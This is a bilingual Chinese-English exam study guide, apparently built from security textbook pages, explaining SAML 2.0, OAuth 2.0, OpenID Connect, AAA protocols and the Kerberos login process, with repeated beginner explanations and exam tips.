SAML 2.0 是 SAML 1.1、Liberty 联盟身份联合框架(ID‑FF)1.2 以及 Internet2 的 Shibboleth 1.3 的融合。 SAML 2.0 规范使用了三个实体:主体(或用户)、服务提供商(SP)和身份 提供商(IdP)。 例如,想象 Sally 正在访问 ucanbeamillionaire.com 上的投 资账户。 该网站要求她登录才能访问账户,并且该网站使用 SAML 2.0。 主体或用户代理 为简化起见,将 Sally 视为主体。 她正试图访问 ucanbeamillionaire.com 上的投资账户。 服务提供商(SP)或依赖方 在此场景中,ucanbeamillionaire.com 网 站提供服务,是服务提供商。 身份提供商(IdP)或断言方 这是一个保存用户身份验证和授权信息的第三方。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 20 / PDF P987

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

When Sally accesses the service provider site, she identifies herself to the SP. The SP then determines the relevant identity provider and redirects Sally to the IdP where she enters her credentials. After she completes the authentication process, the IdP responds to the SP with XML messages (SAML assertions) validating or rejecting Sally's credentials. Upon a successful authentication, the IdP provides Sally's session attributes and what she is authorized to access to the SP. The SP then grants Sally access to her account. The IdP can send three types of XML messages during assertions.

The following are the statements that may be included in a SAML assertion: Authentication Statements An authentication statement provides proof that the user agent provided the proper credentials, identifies the identification method, and identifies the time the user agent logged on. Attribute Statements An attribute statement can be any information about the user agent including their entitlements. Authorization Statements An authorization statement indicates whether the user agent is authorized to access the requested service. If the message indicates access is denied, it indicates why.

Many cloud service providers include SAML in their solutions because it simplifies the services for their customers. SAML provides authentication, attribute, and authorization statements in its assertions. SAML is a popular SSO standard on the Internet. It is used to exchange authentication and authorization (AA) information. OAuth OAuth 2.0 (implying open authorization) is an authorization framework described in RFC 6749 and maintained by the Internet Engineering Task Force (IETF). Many companies on the internet use it to share account information with third-party websites.

For example, imagine you have a social media platform account, and you download an app called Acme that can interact with your social media account and schedule posts in advance. When you try to use the feature in the Acme app, it redirects you to the social media site. That site prompts you to

中文直译 / 整理

当Sally访问服务提供商网站时,她向SP标识自己。 SP随后确定相关的身份提供 商,并将Sally重定向到IdP,在那里她输入自己的凭证。 完成身份验证过程后, IdP以XML消息(SAML断言)响应SP,验证或拒绝Sally的凭证。 身份验证成 功后,IdP向SP提供Sally的会话属性以及她有权访问的内容。 SP随后授予 Sally访问其账户的权限。 身份提供者在断言期间可以发送三种类型的XML消息。 以下是可以包含在 SAML断言中的声明: 认证声明 认证声明提供证明,表明用户代理提供了正确的凭据,标识了身份验 证方法,并标识了用户代理登录的时间。 属性声明 属性声明可以是关于用户代理的任何信息,包括其权限。 授权声明 授权声明指示用户代理是否有权访问请求的服务。 如果消息指示访 问被拒绝,则会说明原因。 许多云服务提供商在其解决方案中包含SAML,因为它简化了为客户提供的 服务。 SAML在其断言中提供认证、属性和授权声明。 SAML是互联网上流行的单点登录标准,用于交换认证和授权(AA)信 息。

OAuth OAuth 2.0(代表开放授权)是由互联网工程任务组(IETF)描述并维护 的授权框架,详见RFC 6749。 许多互联网公司使用它来与第三方网站共 享账户信息。 例如,假设您有一个社交媒体平台账户,并下载了一个名为 Acme 的应用程序, 该程序可以与您的社交媒体账户交互并提前安排帖子。 当您尝试使用 Acme 应 用中的该功能时,它会将您重定向到社交媒体网站。 该网站会提示您

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 21 / PDF P988

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

log on, shows you what permissions the Acme app will access, and then asks if you want to authorize the Acme app to access your social media account. If you approve, the social media platform sends the Acme app an authorization token. The app may accept and enter the authorization token directly, or you may need to enter it into the app's settings. When the app accesses the social media account, it sends an API message and includes the token. Note that this doesn't provide authentication. Instead, it authorizes access to the account. A primary benefit is that you never provide your social media account credentials to the Acme app.

Even if the Acme app is compromised, it does not expose your credentials. Many online sites support OAuth 2.0 but not OAuth 1.0, and OAuth 2.0 is not backward compatible with OAuth 1.0. OAuth is an authorization framework, not an authentication protocol. It exchanges API messages and uses a token to show that access is authorized. OpenID Connect OpenID Connect (OIDC) is an authentication layer using the OAuth 2.0 authorization framework. A key point is that it provides both authentication and authorization. OIDC is maintained by the OpenID Foundation. OIDC uses a JavaScript Object Notation (JSON) Web Token (JWT), also called an ID token. OpenID Connect uses a web service to retrieve the JWT.

In addition to providing authentication, the JWT can also include profile information about the user. Most of this occurs behind the scenes, but you can see it in action by logging onto eBay with a Google account. These processes and interfaces change over time, but the general steps are as follows: 1. If you don't have a Google account, create one first. 2. Ensure you're logged out of eBay and Google, go to http://ebay.com, and click Sign In. 3. Click Continue With Google. A dialog box opens, prompting you to enter your Google email. It also indicates what Google will share with

中文直译 / 整理

登录,显示 Acme 应用将访问的权限,然后询问您是否授权 Acme 应用访问您 的社交媒体账户。 如果您同意,社交媒体平台会向 Acme 应用发送一个授权令 牌。 该应用可能直接接受并输入该授权令牌,或者您可能需要在应用的设置中 手动输入。 当应用访问社交媒体账户时,它会发送一条 API 消息并包含该令牌。 请注意,这并不提供身份验证,而是授权访问账户。 主要优势在于,您从未向 Acme 应用提供您的社交媒体账户凭证。 即使 Acme 应用被攻破,您的凭证也 不会泄露。 许多在线网站支持 OAuth 2.0,但不支持 OAuth 1.0,且 OAuth 2.0 与 OAuth 1.0 不向后兼容。 OAuth 是一种授权框架,而非身份验证协议。 它交换 API 消息,并使 用令牌来证明访问已被授权。 OpenID Connect OpenID Connect (OIDC) 是使用 OAuth 2.0 授权框架的身份验证层。 关键 点在于它同时提供身份验证和授权。 OIDC 由 OpenID 基金会维护。 OIDC 使用 JavaScript 对象表示法 (JSON) Web 令牌 (JWT),也称为 ID 令 牌。

OpenID Connect 使用网络服务来检索 JWT。 除了提供身份验证外, JWT 还可以包含有关用户的配置文件信息。 大部分操作都在后台进行,但您可以通过使用 Google 账号登录 eBay 来查看 其实际运行过程。 这些流程和界面会随时间变化,但一般步骤如下: 1. 如果您没有 Google 账户,请先创建一个。 2. 确保您已退出 eBay 和 Google,前往 http://ebay.com,然后点击登录。 3. 点击使用 Google 继续。 将弹出一个对话框,提示您输入 Google 邮箱地址, 并说明 Google 将与

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 22 / PDF P989

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

http://ebay.com. 4. Enter your email address and press Enter. 5. Enter your password and click Next. 6. If you've enabled 2-Step Verification on your Google account, you'll be prompted to get the code and enter it. You don't need to complete the creation of an eBay account with your Google account. However, if you choose to do so, click the Create Account button. You'll now be logged on to eBay using your Google account. If you log out of eBay and try to log on again, all you need to do is click Sign In and then click Continue with Google. As long as you're still logged on with Google, you'll be logged into eBay without any more steps.

OAuth and OIDC are used with many web-based applications to share information without sharing credentials. OAuth provides authorization. OIDC uses the OAuth framework for authorization and builds on the OpenID technologies for authentication. OIDC uses JSON Web Tokens. Comparing SAML, OAuth, and OpenID Connect It's easy to mix up the differences between SAML, OAuth, and OIDC. This section summarizes key points of each one and points out some of the differences. The following bullets outline the key points about SAML: SAML 2.0 is an open XML-based standard. OASIS adopted it as a standard in 2005.

It utilizes three entities: a principal (such as a user), a service provider (such as a website), and an identity provider (a third party that holds the authentication and authorization information). It can provide authentication, authorization, and attribute information on the principal. The following bullets outline the key points about OAuth: http://ebay.com. 4.

中文直译 / 整理

输入您的电子邮件地址,然后按 Enter 键。 5. 输入您的密码,然后点击“下一步”。 6. 如果您已在 Google 账户中启用了两步验证,系统将提示您获取验证码并输 入。 您无需使用 Google 账号完成 eBay 账号的创建。 但是,如果您选择这样做, 请点击“创建账号”按钮。 此时,您将使用 Google 账号登录 eBay。 如果您 退出 eBay 后再次尝试登录,只需点击“登录”,然后点击“使用 Google 继 续”。 只要您仍处于 Google 登录状态,您就无需额外步骤即可登录 eBay。 OAuth 和 OIDC 被广泛用于许多基于 Web 的应用程序,以在不共享 凭据的情况下共享信息。 OAuth 提供授权功能。 OIDC 在 OAuth 框架的 基础上进行授权,并基于 OpenID 技术实现身份验证。 OIDC 使用 JSON Web 令牌。 比较 SAML、OAuth 和 OpenID Connect 混淆SAML、OAuth和OIDC之间的差异很容易。 本节总结了每种技术的关 键点,并指出了其中的一些差异。 以下要点概述了SAML的关键信息: SAML 2.0是一种开放的基于XML的标准。

OASIS于2005年将其采纳为标准。 它使用三个实体:主体(如用户)、服务提供商(如网站)和身份提供商 (保存认证和授权信息的第三方)。 它可以提供关于主体的认证、授权和属性信息。 以下要点概述了有关OAuth的关键信息:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 23 / PDF P990

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

It's an authorization framework, not an authentication protocol. RFC 6749 describes OAuth 2.0. It exchanges information using APIs. An app obtains an access token from an identity provider. Later, the app includes the access token for authorization. The following bullets outline the key points about OpenID Connect (OIDC): OIDC is an authentication layer using OAuth 2.0. It provides both authentication and authorization. It builds on OpenID (a deprecated standard) but uses a JSON Web Token. Implementing SSO on Internal Networks SSO solutions are also used on internal networks. Kerberos is the most common.

Network access methods allow users to access internal networks from remote locations (such as at home). Two common remote access protocols are RADIUS and TACACS+. In addition to supporting SSO, RADIUS and TACACS+ provide authentication, authorization, and accounting. AAA Protocols Several protocols provide authentication, authorization, and accounting and are referred to as AAA protocols. These provide centralized access control with remote access systems such as virtual private networks (VPNs) and other types of network access servers (NASs). They help protect internal LAN authentication systems and other servers from remote attacks.

If you are using a separate system for remote access, a successful attack on the system only affects the remote access users. In other words, the attacker won't have access to internal accounts. These AAA protocols use the access control elements of identification, authentication, authorization, and accounting as described in Chapter 13. They ensure that a user has valid credentials to authenticate and verify that the user is authorized to connect to the remote access server based on the user's proven identity. Additionally, the accounting element can track the user's network resource usage, which can be used for billing purposes. Some common AAA protocols are covered next.

中文直译 / 整理

它是一个授权框架,而不是身份验证协议。 RFC 6749 描述了 OAuth 2.0。 它通过 API 交换信息。 应用程序从身份提供商获取访问令牌。 之后,应用程序包含访问令牌以进行授权。 以下要点概述了有关OpenID Connect (OIDC) 的关键信息: OIDC 是使用 OAuth 2.0 的身份验证层。 它提供身份验证和授权。 它基于 OpenID(一个已弃用的标准),但使用了 JSON Web Token。 在内部网络上实现单点登录 单点登录解决方案也用于内部网络。 Kerberos 是最常用的。 网络访问方法允 许用户从远程位置(例如在家)访问内部网络。 两种常见的远程访问协议是 RADIUS 和 TACACS+。 除了支持单点登录外,RADIUS 和 TACACS+ 还提 供身份验证、授权和计费。 AAA 协议 几种协议提供身份验证、授权和计费,被称为 AAA 协议。 它们为虚拟专用网 络(VPN)和其他类型的网络访问服务器(NAS)等远程访问系统提供集中式 访问控制。 它们有助于保护内部局域网认证系统和其他服务器免受远程攻击。 如果您使用独立的系统进行远程访问,对该系统的成功攻击仅影响远程访问用 户。

换句话说,攻击者无法访问内部账户。 这些AAA协议使用了身份识别、认证、授权和计费的访问控制元素,具体描 述见第13章。 它们确保用户拥有有效的凭据以进行认证,并根据用户已验证的 身份确认其有权连接到远程访问服务器。 此外,计费元素可以跟踪用户的网络 资源使用情况,可用于计费目的。 接下来将介绍一些常见的AAA协议。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 24 / PDF P991

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Kerberos Ticket authentication is a mechanism that employs a third-party entity to prove identification and provide authentication. The most common and wellknown ticket-based authentication system is Kerberos. The primary purpose of Kerberos is authentication. After users authenticate and prove their identity, Kerberos uses their proven identity to issue tickets, and user accounts present these tickets when accessing resources. The Kerberos name is borrowed from Greek mythology. A three-headed dog named Kerberos, sometimes referred to as Cerberus, guards the gates to the underworld. The dog faces inward, preventing escape rather than denying entrance.

Kerberos offers a single sign-on solution for users and protects logon credentials. Kerberos version 5 relies on symmetric-key cryptography (also known as secret-key cryptography) using the Advanced Encryption Standard (AES) symmetric encryption protocol. Kerberos provides confidentiality and integrity for authentication traffic using end-to-end security and helps protect against eavesdropping and replay attacks. Chapter 6, “Cryptography and Symmetric Key Algorithms,” covers symmetric key encryption in greater depth. Many of the Kerberos roles are on a single server, but they can be installed on different servers.

Larger networks sometimes separate them to increase performance, but smaller networks typically have one Kerberos server performing all of the different roles. Kerberos uses several different elements that are important to understand: Key Distribution Center The Key Distribution Center (KDC) is the trusted third party that provides authentication services. Kerberos uses symmetric-key cryptography to authenticate clients to servers. All clients and servers are registered with the KDC, and it maintains the secret keys for all network members.

Kerberos Authentication Server The authentication server hosts the functions of the KDC: a ticket-granting service (TGS) and an authentication service (AS). However, it is possible to host the ticket-granting service on Kerberos

中文直译 / 整理

票据认证是一种利用第三方实体来证明身份并提供认证的机制。 最常见且广为 人知的基于票据的认证系统是Kerberos。 Kerberos的主要目的是认证。 用户 在完成认证并证明其身份后,Kerberos会利用其已验证的身份颁发票据,用 户账户在访问资源时会出示这些票据。 Kerberos 这一名称源自希腊神话。 一只名为 Kerberos 的三头犬 (有时也称为 Cerberus)守护着冥界的入口。 这只狗面向内部,防止 逃逸,而非阻止进入。 Kerberos 为用户提供单点登录解决方案,并保护登录凭据。 Kerberos 版本 5 依赖对称密钥加密(又称秘密密钥加密),使用高级加密标准(AES)对称加 密协议。 Kerberos 通过端到端安全机制为认证流量提供机密性和完整性,有助 于防范窃听和重放攻击。 第6章,“加密与对称密钥算法”,更深入地介绍了对 称密钥加密。 Kerberos 的许多角色都位于单台服务器上,但也可以安装在不同的服务器上。 较大的网络有时会将它们分离以提高性能,而较小的网络通常由一台 Kerberos 服务器承担所有不同角色。

Kerberos 使用多个重要元素,需要理解: 密钥分发中心 密钥分发中心(KDC)是提供身份验证服务的可信第三方。 Kerberos 使用对称密钥加密技术对客户端进行服务器身份验证。 所有客户端和 服务器均注册于 KDC,它维护所有网络成员的密钥。 Kerberos 认证服务器 认证服务器承载了KDC的功能:票据授予服务( TGS)和认证服务(AS)。 然而,可以将票据授予服务托管在

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
身份 身份是主体在系统中的标识。
学习单元 25 / PDF P992

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

another server. The authentication service verifies or rejects the authenticity and timeliness of tickets. This server is often called the KDC. Ticket A ticket is an encrypted message that provides proof that a subject is authorized to access an object. It is sometimes called a service ticket (ST). Subjects (such as users) request tickets to access objects (such as files), and if they have authenticated and are authorized to access the object, the KDC issues them a ticket. Kerberos tickets have specific lifetimes and usage parameters. Once a ticket expires, a client must request a renewal or a new ticket to continue communications with any server.

Ticket-Granting Ticket A ticket-granting ticket (TGT) provides proof that a subject has authenticated through a KDC and is authorized to request tickets to access other objects. A TGT is encrypted and includes a symmetric key, an expiration time, and the user's IP address. Subjects present the TGT when requesting tickets to access objects. Kerberos Principal The KDC issues tickets to Kerberos principals. A Kerberos principal is typically a user but can be any entity that can request a ticket. Kerberos Realm Generically, a realm is an area controlled or ruled by something. A Kerberos realm is a logical area (such as a domain or network) ruled by Kerberos.

Principals within the realm can request tickets from the Kerberos KDC, and the KDC can issue tickets to principals in the realm. Kerberos requires a database of accounts, typically stored in a directory service such as Microsoft's Active Directory (AD). It exchanges tickets between clients, network servers, and the KDC to prove identity and provide mutual authentication. This allows a client to request resources from the server, with both the client and server having assurances of the identity of the other. These encrypted tickets also ensure that login credentials, session keys, and authentication messages are never transmitted in cleartext. The Kerberos login process works as follows: 1.

The user types a username and password into the client. 2. The client generates a request, including the plaintext username and domain of the user (but not the password), and sends the request to the Kerberos authentication server. 3. The authentication server verifies the username against its database of known users.

中文直译 / 整理

另一台服务器上。 认证服务 验证或拒绝票据的真实性与时效性。 此服务器通常被称为KDC。 票据 票据是一种加密消息,用于证明主体已被授权访问某个对象。 它有时被称为 服务票据(ST)。 主体(如用户)请求票据以访问对象(如文件),如果他们已 通过身份验证并被授权访问该对象,KDC 将向其发放票据。 Kerberos 票据具有 特定的生存期和使用参数。 一旦票据过期,客户端必须请求续订或获取新票据, 才能继续与任何服务器通信。 票据授予票据 票据授予票据(TGT)用于证明主体已通过 KDC 身份验证,并有 权请求访问其他对象的票据。 TGT 是加密的,包含对称密钥、过期时间和用户的 IP 地址。 主体在请求访问对象的票据时需出示 TGT。 Kerberos 主体 KDC 向 Kerberos 主体发放票据。 Kerberos 主体通常是用 户,但也可以是任何可以请求票据的实体。 Kerberos 领域 一般来说,领域是由某事物控制或管理的区域。 Kerberos 领 域是由 Kerberos 管理的逻辑区域(例如域或网络)。 领域内的主体可以从 Kerberos KDC 请求票据,KDC 也可以向领域内的主体颁发票据。

Kerberos 需要一个账户数据库,通常存储在目录服务中,例如 Microsoft 的 Active Directory(AD)。 它在客户端、网络服务器和 KDC 之间交换票据, 以证明身份并提供相互认证。 这使得客户端能够向服务器请求资源,同时客户 端和服务器都能确认对方的身份。 这些加密的票据还确保登录凭证、会话密钥 和认证消息永远不会以明文形式传输。 Kerberos 登录过程如下所示: 1. 用户在客户端输入用户名和密码。 2. 客户端生成一个请求,包含用户的明文用户名和域(但不包含密码), 并将该请求发送到 Kerberos 认证服务器。 3. 认证服务器将用户名与已知用户数据库进行比对。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

证书、签名、强认证常支持真实性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 26 / PDF P993

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

4. The KDC generates a session key that will be used by the client and the Kerberos server. It encrypts this with a hash of the user's password. The KDC also generates an encrypted timestamped TGT. 5. The KDC then transmits the encrypted session key and the encrypted timestamped TGT to the client. 6. The client installs the TGT for use until it expires. The client also decrypts the session key using a hash of the user's password. Note that the user's password is never transmitted over the network, but it is verified. The server encrypts a symmetric key using a hash of the user's password, and it can only be decrypted with a hash of the user's password.

